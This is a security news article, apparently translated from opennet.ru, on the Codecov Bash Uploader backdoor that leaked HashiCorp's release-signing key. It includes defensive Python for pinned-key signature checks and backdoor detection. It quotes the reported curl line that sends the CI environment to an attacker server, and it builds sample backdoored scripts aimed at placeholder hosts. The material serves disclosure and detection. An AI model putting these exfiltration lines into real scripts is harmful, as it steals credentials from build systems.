Injection of malicious code into Codecov script compromised HashiCorp's PGP key

HashiCorp, the developer of the open source tools Vagrant, Packer, Nomad and Terraform, has disclosed that the private GPG key used to sign its releases was exposed. An attacker holding that key could have shipped tampered HashiCorp binaries carrying a signature that verifies as genuine. HashiCorp states that its investigation found no evidence that the key was used to sign any unauthorized release.

The compromised key has been revoked and a new signing key has been put into use. Only verification through the SHA256SUMS and SHA256SUMS.sig files was affected; the signing of the Linux DEB and RPM packages distributed through releases.hashicorp.com, and the code signing of the macOS and Windows (Authenticode) binaries, use separate keys and are not affected. Anyone verifying releases against the old key must import the replacement: signatures made with the new key do not verify against the revoked one, and signatures by the revoked key should no longer be accepted.
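The verification path that was affected is the one a user runs against SHA256SUMS and SHA256SUMS.sig. The following Python is an added example (not HashiCorp's tooling) of that check done defensively: the signature is accepted only if gpg reports VALIDSIG from a key whose fingerprint is pinned in advance, so a signature made with the revoked key is refused even though it still verifies mathematically, and only then is the archive's digest compared with its entry in SHA256SUMS. The fingerprint, file names, archive bytes and gpg status transcripts are constructed placeholders, not HashiCorp's real values; the gpg invocation in verify_release assumes the gpg binary is installed.

```python
"""Verify a signed SHA256SUMS release the way the affected HashiCorp flow does.

Added example, not HashiCorp's tooling.  The key fingerprint, file names, archive
bytes and gpg status transcripts below are constructed placeholders.
"""
import hashlib
import re
import subprocess
from pathlib import Path

# Placeholder for the fingerprint of the release-signing key verified out of band.
PINNED_FPR = "0123456789ABCDEF0123456789ABCDEF01234567"  # hypothetical, not HashiCorp's key

# Constructed sample release data (not a real HashiCorp artifact).
SAMPLE_ARCHIVE = b"PK\x03\x04 constructed archive bytes"
SAMPLE_NAME = "example_1.0.0_linux_amd64.zip"
SAMPLE_SUMS = hashlib.sha256(SAMPLE_ARCHIVE).hexdigest() + "  " + SAMPLE_NAME + "\n"

# Constructed 'gpg --status-fd' transcripts: a good signature from the pinned key, and
# the same signature after that key was revoked.
_VALIDSIG = f"[GNUPG:] VALIDSIG {PINNED_FPR} 2021-04-22 1619049600 0 4 0 1 10 00 {PINNED_FPR}"
STATUS_GOOD = "\n".join([
    "[GNUPG:] NEWSIG",
    f"[GNUPG:] GOODSIG {PINNED_FPR[-16:]} Example Release Signing <release@example.invalid>",
    _VALIDSIG,
    "[GNUPG:] TRUST_UNDEFINED 0 pgp",
])
STATUS_REVOKED = "\n".join([
    "[GNUPG:] NEWSIG",
    f"[GNUPG:] REVKEYSIG {PINNED_FPR[-16:]} Example Release Signing <release@example.invalid>",
    _VALIDSIG,
])


def parse_sha256sums(text):
    """Parse 'hexdigest  filename' lines (sha256sum format, optional '*' binary marker)."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.fullmatch(r"([0-9a-fA-F]{64})\s+\*?(\S.*)", line)
        if not m:
            raise ValueError(f"malformed SHA256SUMS line: {line!r}")
        sums[m.group(2)] = m.group(1).lower()
    return sums


def archive_matches(sums, name, data):
    """True only if the archive is listed in SHA256SUMS and its digest equals the listed one."""
    expected = sums.get(name)
    return expected is not None and hashlib.sha256(data).hexdigest() == expected


def signature_status(status_text, trusted_fpr):
    """Interpret 'gpg --status-fd' output.

    gpg exits 0 for any cryptographically valid signature, including one made by a key that
    is revoked (REVKEYSIG) or expired (EXPKEYSIG), and for a valid signature by a key you
    never meant to trust.  So: reject on any failure keyword, require VALIDSIG, and require
    the signing key's fingerprint to equal the pinned one.  After a key compromise this is
    what stops signatures made with the revoked key from being accepted.
    """
    keywords = {}
    for line in status_text.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[0] == "[GNUPG:]":
            keywords.setdefault(fields[1], fields[2:])
    for bad in ("BADSIG", "ERRSIG", "NODATA", "NO_PUBKEY", "REVKEYSIG", "EXPKEYSIG", "EXPSIG"):
        if bad in keywords:
            return {"valid": False, "fingerprint": None, "reason": bad}
    if "VALIDSIG" not in keywords:
        return {"valid": False, "fingerprint": None, "reason": "no VALIDSIG"}
    # VALIDSIG: <signing (sub)key fpr> <date> <ts> <expiry> <ver> <rsv> <pk-algo> <hash> <class> <primary fpr>
    args = keywords["VALIDSIG"]
    signing_fpr, primary_fpr = args[0].upper(), args[-1].upper()
    pinned = trusted_fpr.replace(" ", "").upper()
    if pinned not in (signing_fpr, primary_fpr):
        return {"valid": False, "fingerprint": signing_fpr, "reason": "untrusted key"}
    return {"valid": True, "fingerprint": signing_fpr, "reason": "VALIDSIG from pinned key"}


def verify_release(release_dir, archive, keyring, trusted_fpr=PINNED_FPR):
    """Full flow: gpg over SHA256SUMS.sig, then the archive digest.  Assumes gpg is installed
    and that `keyring` holds only the current release key (the revoked key must not be in it)."""
    release_dir = Path(release_dir)
    proc = subprocess.run(
        ["gpg", "--batch", "--no-default-keyring", "--keyring", str(Path(keyring).resolve()),
         "--status-fd", "1", "--verify",
         str(release_dir / "SHA256SUMS.sig"), str(release_dir / "SHA256SUMS")],
        capture_output=True, text=True)
    if not signature_status(proc.stdout, trusted_fpr)["valid"]:
        return False
    sums = parse_sha256sums((release_dir / "SHA256SUMS").read_text())
    return archive_matches(sums, archive, (release_dir / archive).read_bytes())


if __name__ == "__main__":
    print("good   :", signature_status(STATUS_GOOD, PINNED_FPR))
    print("revoked:", signature_status(STATUS_REVOKED, PINNED_FPR))
    print("archive:", archive_matches(parse_sha256sums(SAMPLE_SUMS), SAMPLE_NAME, SAMPLE_ARCHIVE))
```

The point of parsing the status lines rather than trusting gpg's exit code is that a revoked key still produces a signature gpg calls valid; the pinned fingerprint and the REVKEYSIG check are what turn the key rotation described above into an actual refusal.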

The key leaked through the Codecov Bash Uploader script (codecov-bash), which HashiCorp's infrastructure used to upload code-coverage reports from continuous integration jobs to Codecov. During the attack on Codecov the script was backdoored so that credentials and keys present in the CI environment were sent to a server controlled by the attackers.

The attackers got in through an error in the process that built Codecov's Docker image, which let them extract the credentials for the GCS (Google Cloud Storage) bucket from which the Bash Uploader served at codecov.io was distributed, and thereby modify the script. The modification was made on January 31 and went unnoticed for two months, during which it harvested data from customers' continuous integration environments. The injected code captured the remote URLs of the Git repository under test and the complete set of environment variables, which in CI systems typically carry the tokens, keys and passwords that grant access to application source, repositories and services such as Amazon Web Services and GitHub.

Besides direct invocation, the Bash Uploader is embedded in other Codecov uploaders, including codecov-action (GitHub Actions), codecov-circleci-orb and codecov-bitrise-step, so their users are affected as well. All users of codecov-bash and the products built on it are advised to audit their infrastructure and rotate every credential and key that was exposed to the CI environment. A backdoored copy of the script can be recognised by the presence of the line:

curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || true
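The string match above catches the one reported line. The following Python is an added example (not Codecov's or HashiCorp's code) of the two checks a CI owner would want: a scan of a local copy of the uploader for the reported exfiltration line and for the broader pattern of curl or wget shipping $(env) or $(printenv) output anywhere, and a pinned-digest gate that refuses to run a downloaded script whose SHA-256 differs from the value recorded in the pipeline, which is the replacement for the bash <(curl -s https://codecov.io/bash) pattern that left no local copy to compare. The script excerpts, the 203.0.113.10 host and the pinned digest are constructed sample inputs.

```python
"""Scan a CI uploader script for the codecov-bash backdoor and gate execution on a pinned digest.

Added example, not Codecov's or HashiCorp's code.  The sample scripts, the host 203.0.113.10
and the pinned digest are constructed inputs.
"""
import hashlib
import re

# The exfiltration line reported for the compromised codecov-bash, with the attacker host
# left variable:  curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://<host>/upload/v2 || true
KNOWN_IOC = re.compile(
    r'curl\s+-sm\s+0\.5\s+-d\s+"\$\(git remote -v\)<<<<<< ENV \$\(env\)"\s+https?://\S+/upload/v2'
)
# Broader heuristic: any curl/wget invocation that sends the output of env or printenv.
GENERIC_ENV_EXFIL = re.compile(r"\b(curl|wget)\b.*\$\((env|printenv)\)")


def find_indicators(script_text):
    """Return (line_number, kind, line) for each suspicious line; an empty list for a clean script."""
    hits = []
    for n, line in enumerate(script_text.splitlines(), 1):
        if KNOWN_IOC.search(line):
            hits.append((n, "known-ioc", line.strip()))
        elif GENERIC_ENV_EXFIL.search(line):
            hits.append((n, "env-exfil", line.strip()))
    return hits


def digest_matches(script_bytes, pinned_sha256):
    """Compare a downloaded script with the digest pinned in the pipeline configuration."""
    return hashlib.sha256(script_bytes).hexdigest() == pinned_sha256.strip().lower()


def safe_to_run(script_bytes, pinned_sha256):
    """Execution gate: the script must match the pinned digest and show no indicators.
    Download to a file and call this before `bash codecov.sh`, instead of `bash <(curl ...)`."""
    return digest_matches(script_bytes, pinned_sha256) and not find_indicators(
        script_bytes.decode("utf-8", errors="replace")
    )


# Constructed excerpt in the style of an uploader: legitimate curl use, no env exfiltration.
CLEAN_SCRIPT = r'''#!/usr/bin/env bash
url="https://codecov.io"
report=$(cat coverage.txt)
curl -X POST --data-binary @coverage.txt "$url/upload/v4?commit=$commit&token=$token"
'''

# The same excerpt with the reported backdoor line inserted (placeholder host 203.0.113.10).
BACKDOORED_SCRIPT = CLEAN_SCRIPT.replace(
    'report=$(cat coverage.txt)\n',
    'report=$(cat coverage.txt)\n'
    'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://203.0.113.10/upload/v2 || true\n',
)

# A variant that dodges the exact-string check; the heuristic still fires on it.
VARIANT_SCRIPT = CLEAN_SCRIPT + 'curl -s -d "$(printenv)" https://example.invalid/c >/dev/null\n'

# What the pipeline would have recorded for the known-good script.
PINNED_SHA256 = hashlib.sha256(CLEAN_SCRIPT.encode()).hexdigest()

if __name__ == "__main__":
    for name, text in (("clean", CLEAN_SCRIPT), ("backdoored", BACKDOORED_SCRIPT), ("variant", VARIANT_SCRIPT)):
        print(name, find_indicators(text), safe_to_run(text.encode(), PINNED_SHA256))
```

The digest gate is the check that would have caught this incident regardless of what the injected line looked like: the modified script has a different SHA-256 from the one the pipeline recorded, so it is refused before any pattern matching runs. The indicator scan is for triage of copies that were already fetched and executed.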

Source: opennet.ru
